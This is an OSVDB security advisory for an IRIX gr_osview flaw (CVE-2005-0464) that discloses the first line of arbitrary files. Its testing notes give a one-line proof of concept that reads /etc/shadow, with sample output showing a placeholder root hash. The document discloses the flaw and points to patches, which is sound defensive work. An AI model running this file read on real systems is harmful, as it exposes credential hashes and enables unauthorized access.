IRIX gr_osview -D Parameter Arbitrary File Segment Disclosure

2005-02-18T00:00:00
ID OSVDB:15351
Type osvdb
Reporter iDEFENSE (idlabs-advisories@idefense.com)
Modified 2005-02-18T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may lead to unauthorized information disclosure. gr_osview does not correctly verify permissions when opening description files, so it discloses the first line of arbitrary files via the "-d" and "-D" options, resulting in a loss of confidentiality.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, IRIX has released patches to address this vulnerability.

Manual Testing Notes

    user@irix$ gr_osview -d -D /etc/shadow
    sgets: waiting for string
    *SR> read <root:PASSWDHASHHERE:2051::::::>
    gr_osview: description file format error on line 1

References:

Vendor Specific Advisory URL
Security Tracker: 1013662
Secunia Advisory ID: 14875
Related OSVDB ID: 15350
Other Advisory URL: http://www.idefense.com/application/poi/display?id=226&type=vulnerabilities
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0101.html
CVE-2005-0464